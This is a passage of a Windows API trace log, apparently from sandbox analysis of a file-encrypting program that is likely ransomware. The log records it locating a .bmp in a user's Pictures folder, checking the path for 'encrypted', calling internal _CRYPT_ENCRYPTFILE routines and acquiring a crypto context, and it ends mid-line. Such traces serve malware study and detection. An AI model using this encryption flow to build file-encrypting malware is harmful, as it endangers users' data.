[0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.632] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.632] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.633] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.633] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.633] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0039.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8891f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.633] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.633] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.633] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.633] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0039.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.634] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.634] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.634] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.634] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.634] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.634] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.634] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b6f280, ftCreationTime.dwHighDateTime=0x1d5c55b, ftLastAccessTime.dwLowDateTime=0x83e53da0, ftLastAccessTime.dwHighDateTime=0x1d5bbf8, ftLastWriteTime.dwLowDateTime=0x83e53da0, ftLastWriteTime.dwHighDateTime=0x1d5bbf8, nFileSizeHigh=0x0, nFileSizeLow=0x6218, dwReserved0=0x0, dwReserved1=0x777648, cFileName="4g9fyJO.bmp", cAlternateFileName="")) returned 0x7c20c0 [0039.634] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.634] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b6f280, ftCreationTime.dwHighDateTime=0x1d5c55b, ftLastAccessTime.dwLowDateTime=0x83e53da0, ftLastAccessTime.dwHighDateTime=0x1d5bbf8, ftLastWriteTime.dwLowDateTime=0x83e53da0, ftLastWriteTime.dwHighDateTime=0x1d5bbf8, nFileSizeHigh=0x0, nFileSizeLow=0x6218, dwReserved0=0x0, dwReserved1=0x777648, cFileName="4g9fyJO.bmp", cAlternateFileName="")) returned 0x7c20c0 [0039.634] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.635] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.635] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rPtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tL9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RGZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fyJO.bmp\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.637] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.637] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.637] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.637] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b6f280, ftCreationTime.dwHighDateTime=0x1d5c55b, ftLastAccessTime.dwLowDateTime=0x83e53da0, ftLastAccessTime.dwHighDateTime=0x1d5bbf8, ftLastWriteTime.dwLowDateTime=0x83e53da0, ftLastWriteTime.dwHighDateTime=0x1d5bbf8, nFileSizeHigh=0x0, nFileSizeLow=0x6218, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="4g9fyJO.bmp", cAlternateFileName="")) returned 0x7c2100 [0039.638] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.638] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.638] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.638] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0039.639] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", 